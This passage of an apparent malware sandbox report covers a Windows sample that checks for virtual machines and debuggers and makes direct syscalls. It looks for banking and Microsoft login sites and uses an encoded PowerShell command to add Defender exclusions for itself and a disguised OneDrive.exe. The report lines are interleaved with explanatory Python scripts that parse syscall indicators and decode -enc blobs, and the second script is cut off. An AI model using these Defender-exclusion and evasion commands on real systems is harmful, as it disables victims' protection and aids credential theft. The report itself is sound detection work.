Source: tmpA901.tmp.dat.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: tmpA901.tmp.dat.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: tmpA901.tmp.dat.0.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: Amcache.hve.12.dr	Binary or memory string: VMware20,1
Source: OneDrive.exe, 0000000E.00000002.2653178477.0000019A26E51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
Source: Amcache.hve.12.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.12.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.12.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.12.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.12.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.12.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: OneDrive.exe, 0000000E.00000002.2653178477.0000019A26E51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft|VMWare|Virtual
Source: Amcache.hve.12.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.12.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.12.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.12.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: tmpA901.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: tmpA901.tmp.dat.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: tmpA901.tmp.dat.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: Amcache.hve.12.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.12.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.12.dr	Binary or memory string: VMware, Inc.
Source: tmpA901.tmp.dat.0.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: Amcache.hve.12.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.12.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.12.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.12.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: Amcache.hve.12.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: tmpA901.tmp.dat.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: Amcache.hve.12.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.12.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: b39wW3jYKO.exe, 00000000.00000002.4644423945.000001419AC09000.00000004.00000020.00020000.00000000.sdmp, arndry.exe, 00000009.00000002.2503320475.000000001B185000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: tmpA901.tmp.dat.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: tmpA901.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: Amcache.hve.12.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.12.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.12.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: tmpA901.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: tmpA901.tmp.dat.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: tmpA901.tmp.dat.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: tmpA901.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: tmpA901.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: Amcache.hve.12.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: tmpA901.tmp.dat.0.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: tmpA901.tmp.dat.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: tmpA901.tmp.dat.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: tmpA901.tmp.dat.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: tmpA901.tmp.dat.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: tmpA901.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information queried: ProcessInformation

Anti Debugging
Source: C:\Users\user\AppData\Local\Temp\arndry.exe	Code function: 9_2_00007FFD34687791 CheckRemoteDebuggerPresent,9_2_00007FFD34687791
Source: C:\Users\user\AppData\Local\Temp\arndry.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	Process token adjusted: Debug (3 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\arndry.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion
Source: b39wW3jYKO.exe, SchemaTagBridge.cs	Reference to suspicious API methods: ((Application)P_0).TryFindResource(P_1)
Source: arndry.exe.0.dr, Messages.cs	Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
Source: arndry.exe.0.dr, XLogger.cs	Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)
Source: 0.2.b39wW3jYKO.exe.1419afb0000.0.raw.unpack, NativeMethods.cs	Reference to suspicious API methods: OpenProcessToken(hProcess, desiredAccess, out var TokenHandle)
Source: 0.2.b39wW3jYKO.exe.1419afb0000.0.raw.unpack, ResourceReferenceValue.cs	Reference to suspicious API methods: NativeMethods.LoadLibrary(ResourceFilePath)
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\engineer\Desktop\b39wW3jYKO.exe; Add-MpPreference -ExclusionProcess C:\Users\engineer\Desktop\b39wW3jYKO.exe;Add-MpPreference -ExclusionPath C:\Users\engineer\documents\OneDrive.exe; Add-MpPreference -ExclusionProcess C:\Users\engineer\documents\OneDrive.exe
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\engineer\Desktop\b39wW3jYKO.exe; Add-MpPreference -ExclusionProcess C:\Users\engineer\Desktop\b39wW3jYKO.exe;Add-MpPreference -ExclusionPath C:\Users\engineer\documents\OneDrive.exe; Add-MpPreference -ExclusionProcess C:\Users\engineer\documents\OneDrive.exe
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtQueryValueKey: Direct from: 0x7FFD93C9869F
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtDeviceIoControlFile: Direct from: 0x7FFD34BBCF44
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtOpenKey: Direct from: 0x7FFD3497814B
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtQueryValueKey: Direct from: 0x7FFD93C6FD76
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtQueueApcThread: Direct from: 0x7FFD93C99EE7
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtQueryValueKey: Direct from: 0x7FFD93C6FEA9
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtQueryVolumeInformationFile: Direct from: 0x7FFD93CB46F1
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtQueryVolumeInformationFile: Direct from: 0x7FFD93C3D195
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtQueryValueKey: Direct from: 0x7FFD93D846B8
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtSetInformationProcess: Direct from: 0x7FFD93BB626B
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtSetInformationProcess: Direct from: 0x7FFD93C4A3DF
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtCreateFile: Direct from: 0x7FFD93CB4667
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtMapViewOfSection: Direct from: 0x7FFD34BBC242
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtCreateThreadEx: Direct from: 0x7FFD93B588D5
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtCreateMutant: Direct from: 0x7FFD3496E34B
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtQueryAttributesFile: Direct from: 0x7FFD93C49F1C
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtDeviceIoControlFile: Direct from: 0x7FFD34B9F591
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtSetInformationProcess: Direct from: 0x7FFD93C4DA3C
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtQueryValueKey: Direct from: 0x7FFD93BBE9FE
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtUnmapViewOfSection: Direct from: 0x7FFD921E3C7D
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtDeviceIoControlFile: Direct from: 0x7FFD3497D938
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtSetInformationProcess: Direct from: 0x7FFD93CB4672
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtCreateThreadEx: Direct from: 0x7FFD912AB1AC
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtUnmapViewOfSection: Direct from: 0x7FFD921E3F5F
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtOpenKey: Direct from: 0x7FFD921E3812
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtReadFile: Direct from: 0x7FFD93C76FE3
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtCreateThreadEx: Direct from: 0x7FFD93BE67CB
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtDeviceIoControlFile: Direct from: 0x7FFD93CFF207
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtCreateFile: Direct from: 0x7FFD93C6FCCE
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtOpenKeyEx: Direct from: 0x7FFD921E7FC1
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtDeviceIoControlFile: Direct from: 0x7FFD34964514
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtSetInformationFile: Direct from: 0x7FFD93BB72C8
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtSetInformationFile: Direct from: 0x7FFD921DA731
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtCreateThreadEx: Direct from: 0x7FFD34807A54
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtReadFile: Direct from: 0x7FFD93C45F36
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtCreateMutant: Direct from: 0x7FFD34E76CD0
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtMapViewOfSection: Direct from: 0x7FFD93CB7EE9
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtQueryVolumeInformationFile: Direct from: 0x7FFD9287008B
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtQueryValueKey: Direct from: 0x7FFD93D568FC
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtQueryVolumeInformationFile: Direct from: 0x7FFD921E734C
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtSetContextThread: Direct from: 0x7FFD93B791D2
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtCreateFile: Direct from: 0x7FFD93C45FD7
Source: C:\Users\user\Desktop\b39wW3jYKO.exe	NtEnumerateKey: Direct from: 0x7FFD34976D45
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryValueKey: Direct from: 0x7FFD93BC40A3Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryValueKey: Direct from: 0x7FFD8F761DC5Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtSetInformationProcess: Direct from: 0x1419B029C85Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtDeviceIoControlFile: Direct from: 0x7FFD34961E07Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtCreateFile: Direct from: 0x7FFD93C3D1F6Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtSetInformationProcess: Direct from: 0x7FFD34B8716AJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtCreateMutant: Direct from: 0x7FFD940BCAC6Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtSetInformationProcess: Direct from: 0x7FFD93C6A028Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryValueKey: Direct from: 0x7FFD921E4413Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtOpenKey: Direct from: 0x7FFD93BBDF8FJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtCreateFile: Direct from: 0x7FFD93C4A418Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryAttributesFile: Direct from: 0x7FFD92870674Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtCreateFile: Direct from: 0x7FFD921E517FJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtNotifyChangeKey: Direct from: 0x7FFD3495B256Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtSetInformationProcess: Direct from: 0x7FFD93BAFF6BJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtOpenKeyEx: Direct from: 0x7FFD93CC3619Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryValueKey: Direct from: 0x7FFD93C9797BJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtSetValueKey: Direct from: 0x7FFD9287296FJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtDeviceIoControlFile: Direct from: 0x7FFD3497F3E5Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryValueKey: Direct from: 0x7FFD921E3695Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtReadFile: Direct from: 0x7FFD921DC9C8Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtOpenKeyEx: Direct from: 0x7FFD3480A044Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtSetInformationProcess: Direct from: 0x7FFD93C4A427Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtCreateKey: Direct from: 0x7FFD921E126EJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtDeviceIoControlFile: Direct from: 0x7FFD3497C3FFJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryValueKey: Direct from: 0x7FFD93CC36AEJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtSetInformationProcess: Direct from: 0x7FFD93CB462EJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtOpenKey: Direct from: 0x7FFD34809C9DJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryValueKey: Direct from: 0x7FFD93C6FC6CJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtSetInformationProcess: Direct from: 0x7FFD93BAFF46Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtOpenKey: Direct from: 0x7FFD93BC47E4Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtCreateFile: Direct from: 0x7FFD93BB62A4Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtClose: Direct from: 0x7FFD34805901
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtOpenFile: Direct from: 0x7FFD921DE322Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtSetInformationProcess: Direct from: 0x7FFD93C6A005Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryValueKey: Direct from: 0x7FFD921E5768Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryAttributesFile: Direct from: 0x7FFD93C2BC4AJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtOpenFile: Direct from: 0x7FFD93C332D3Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtClose: Direct from: 0x7FFD921E713F
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtOpenKey: Direct from: 0x7FFD93C54E3CJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtCreateThreadEx: Direct from: 0x7FFDB43E26A1Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryVolumeInformationFile: Direct from: 0x7FFD93CB46D9Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtMapViewOfSection: Direct from: 0x7FFD93C4A7F5Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtMapViewOfSection: Direct from: 0x7FFD3496969AJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtCreateThreadEx: Direct from: 0x7FFD93BE8EE0Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtSetInformationProcess: Direct from: 0x7FFD93BAFF57Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtSetInformationProcess: Direct from: 0x7FFD93C4DAA0Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtSetInformationProcess: Direct from: 0x7FFD93BB62B3Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtSetValueKey: Direct from: 0x7FFD3480A41FJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtOpenKeyEx: Direct from: 0x7FFD93C287B7Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtMapViewOfSection: Direct from: 0x7FFD921E3EA1Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryVolumeInformationFile: Direct from: 0x7FFD9286F239Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryValueKey: Direct from: 0x7FFD93CC040BJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtCreateMutant: Direct from: 0x7FFD921DD2E8Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtMapViewOfSection: Direct from: 0x7FFD3495B460Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtCreateFile: Direct from: 0x7FFD93C783DCJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryValueKey: Direct from: 0x7FFD921E4D36Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryValueKey: Direct from: 0x7FFD921E55C5Jump to behavior
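What turns a list like the one above into the "direct / indirect syscall" verdict is where each Nt* call was issued from. The address is checked against the process's module map: a caller inside ntdll.dll is the normal stub (or an indirect-syscall gadget, which only a stack walk separates from the normal path), a caller in any other module or in memory backed by no module means the `syscall` instruction was executed without going through ntdll. The script below is an added example, not Joe Sandbox code: it parses the report's "Source: <process><NtCall>: Direct from: 0x…" line format (with or without the process prefix, one or several addresses per line) and classifies each address. The sample lines and the module ranges are constructed for illustration; for a real case the ranges come from the report's loaded-module list or from a debugger's module listing for the same process.

```python
"""Parse 'Direct from' syscall lines and classify the address each call was issued from.

Added example, not Joe Sandbox code: the sample lines are constructed in the report's
line format with made-up addresses, and the module map is hypothetical.
"""
import re
from collections import defaultdict

# "Source: <process path><NtCall>: Direct from: 0x<hex>[, 0x<hex>...][Jump to behavior]"
# The process prefix is optional so the same parser takes lines with or without it.
LINE_RE = re.compile(
    r"(?:Source:\s*(?P<proc>\S+?\.exe)\s*\|?\s*)?"
    r"(?P<syscall>Nt\w+):\s*Direct from:\s*(?P<addrs>0x[0-9A-Fa-f]+(?:,\s*0x[0-9A-Fa-f]+)*)"
)
HEX_RE = re.compile(r"0x([0-9A-Fa-f]+)")

# Constructed sample lines (not from the report): same layout, made-up addresses.
SAMPLE_LINES = r"""
Source: C:\Users\user\Desktop\sample.exeNtCreateFile: Direct from: 0x7FF800123456Jump to behavior
Source: C:\Users\user\Desktop\sample.exeNtCreateThreadEx: Direct from: 0x7FF800234567Jump to behavior
Source: C:\Users\user\Desktop\sample.exeNtSetInformationProcess: Direct from: 0x1F4A0BC0D10Jump to behavior
Source: C:\Users\user\Desktop\sample.exeNtQueryValueKey: Direct from: 0x7FF801A00ABC
NtOpenKey: Direct from: 0x7FF8001111AA, 0x7FF801A00ABC
"""

# Hypothetical module map {name: (base, end)}. For a real case take the ranges from the
# report's loaded-module list or a debugger's module listing for the same process.
SAMPLE_MODULES = {
    "ntdll.dll": (0x7FF801A00000, 0x7FF801BF5000),
    "clr.dll": (0x7FF800000000, 0x7FF8009A0000),
}


def parse_lines(text):
    """(process, syscall, address) per address, in report order; process may be ''."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            for hexaddr in HEX_RE.findall(m["addrs"]):
                records.append((m["proc"] or "", m["syscall"], int(hexaddr, 16)))
    return records


def module_of(addr, modules):
    """Name of the module whose [base, end) range contains addr, else None."""
    for name, (base, end) in modules.items():
        if base <= addr < end:
            return name
    return None


def classify(addr, modules):
    """Verdict for the address a syscall was issued from.

    In ntdll.dll  : the normal stub, or an indirect syscall that jumped to ntdll's own
                    `syscall` instruction; only the call stack separates the two.
    Other module  : a direct syscall, the `syscall` instruction lives in that module.
    No module     : a direct syscall from unbacked (allocated / JIT / shellcode) memory.
    """
    name = module_of(addr, modules)
    if name is None:
        return "direct syscall from unbacked memory"
    if name.lower() == "ntdll.dll":
        return "inside ntdll.dll (normal path or indirect syscall: check the call stack)"
    return f"direct syscall from {name}"


def summarize(records, modules):
    """{syscall: {verdict: [distinct addresses]}}."""
    grouped = defaultdict(lambda: defaultdict(set))
    for _proc, syscall, addr in records:
        grouped[syscall][classify(addr, modules)].add(addr)
    return {sc: {v: sorted(a) for v, a in vs.items()} for sc, vs in grouped.items()}


if __name__ == "__main__":
    for syscall, verdicts in summarize(parse_lines(SAMPLE_LINES), SAMPLE_MODULES).items():
        for verdict, addrs in verdicts.items():
            print(f"{syscall:24} {verdict:72} {', '.join(hex(a) for a in addrs)}")
```

An address that lands in no module at all (the 0x1F4A… sample) is the strongest signal, because nothing legitimate issues syscalls from unbacked memory; an address inside ntdll only says "look at the stack", since an indirect syscall deliberately lands there.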
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc 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
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Process created: C:\Users\user\AppData\Local\Temp\arndry.exe "C:\Users\user\AppData\Local\Temp\arndry.exe"
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcaguabgbnagkabgblaguacgbcaeqazqbzagsadabvahaaxabiadmaoqb3afcamwbqafkaswbpac4azqb4aguaowagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaacgbvagmazqbzahmaiabdadoaxabvahmazqbyahmaxablag4azwbpag4azqblahiaxabeaguacwbrahqabwbwafwaygazadkadwbxadmaagbzaesatwauaguaeabladsaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcaguabgbnagkabgblaguacgbcagqabwbjahuabqblag4adabzafwatwbuaguarabyagkadgblac4azqb4aguaowagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaacgbvagmazqbzahmaiabdadoaxabvahmazqbyahmaxablag4azwbpag4azqblahiaxabkag8aywb1ag0azqbuahqacwbcae8abgblaeqacgbpahyazqauaguaeablaa==
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcaguabgbnagkabgblaguacgbcaeqazqbzagsadabvahaaxabiadmaoqb3afcamwbqafkaswbpac4azqb4aguaowagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaacgbvagmazqbzahmaiabdadoaxabvahmazqbyahmaxablag4azwbpag4azqblahiaxabeaguacwbrahqabwbwafwaygazadkadwbxadmaagbzaesatwauaguaeabladsaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcaguabgbnagkabgblaguacgbcagqabwbjahuabqblag4adabzafwatwbuaguarabyagkadgblac4azqb4aguaowagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaacgbvagmazqbzahmaiabdadoaxabvahmazqbyahmaxablag4azwbpag4azqblahiaxabkag8aywb1ag0azqbuahqacwbcae8abgblaeqacgbpahyazqauaguaeablaa==
Source: b39wW3jYKO.exe, 00000000.00000002.4618510904.00000141820D1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
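The two powershell.exe command lines above are printed in lower case (the path is folded too), and base64 is case-sensitive, so the blob as shown does not decode directly. What the summary's Sigma hit ("Powershell Base64 Encoded MpPreference Cmdlet") refers to is an Add-MpPreference exclusion command encoded the way `-EncodedCommand` expects: UTF-16LE text, base64. The script below is an added example, not Joe Sandbox code. It decodes a normal `-enc` argument, recovers a case-folded blob up to the ambiguity that UTF-16LE leaves (the 0x00 high byte of every ASCII character pins most letters; at most one character in three has two possible readings), pins those positions with known substrings, and produces the three base64 spellings of a cmdlet name that a Sigma rule searches for. The sample command and blob are constructed; the blob printed in the report can be passed to restore_lowercased_enc unchanged.

```python
"""Decode PowerShell -enc (UTF-16LE base64) blobs, including case-folded ones.

Added example, not Joe Sandbox code. SAMPLE_CMD is a constructed command in the
shape the Sigma hit describes; the blob printed in the report can be passed to
restore_lowercased_enc() unchanged.
"""
import base64
from itertools import product
from string import ascii_lowercase, ascii_uppercase, digits

B64 = ascii_uppercase + ascii_lowercase + digits + "+/"


def encode_enc(script: str) -> str:
    """What an attacker does: UTF-16LE text, base64, handed to powershell.exe -enc."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


def decode_enc(blob: str) -> str:
    """The normal case: a case-intact blob decodes straight back to the script text."""
    blob = blob.strip()
    return base64.b64decode(blob + "=" * (-len(blob) % 4)).decode("utf-16-le")


def _group_bytes(group: str) -> bytes:
    """Decode one base64 group of 2, 3 or 4 characters into 1, 2 or 3 bytes."""
    bits = 0
    for c in group:
        bits = (bits << 6) | B64.index(c)
    nbytes = len(group) * 6 // 8
    return (bits >> (len(group) * 6 - nbytes * 8)).to_bytes(nbytes, "big")


def _case_variants(group: str):
    """Every upper/lower spelling of a group (digits, '+' and '/' have no case)."""
    choices = [(c.upper(), c.lower()) if c.isalpha() else (c,) for c in group]
    return ("".join(combo) for combo in product(*choices))


def _plausible(chunk: bytes, offset: int) -> bool:
    """UTF-16LE ASCII text: odd byte offsets are 0x00, even ones printable ASCII."""
    return all(b == 0 if (offset + i) % 2 else 0x20 <= b <= 0x7E
               for i, b in enumerate(chunk))


def restore_lowercased_enc(blob: str) -> list:
    """One candidate set per decoded character of a case-folded -enc blob.

    Lowercasing base64 loses information, but the 0x00 high byte of every UTF-16LE
    ASCII character pins most letters; what is left is at most one character in
    three with two possible readings, returned as a two-element set.
    """
    blob = blob.strip().rstrip("=")
    if len(blob) % 4 == 1:
        raise ValueError("not a base64 length")
    chars, offset = [], 0                    # offset = byte offset of the group
    for start in range(0, len(blob), 4):
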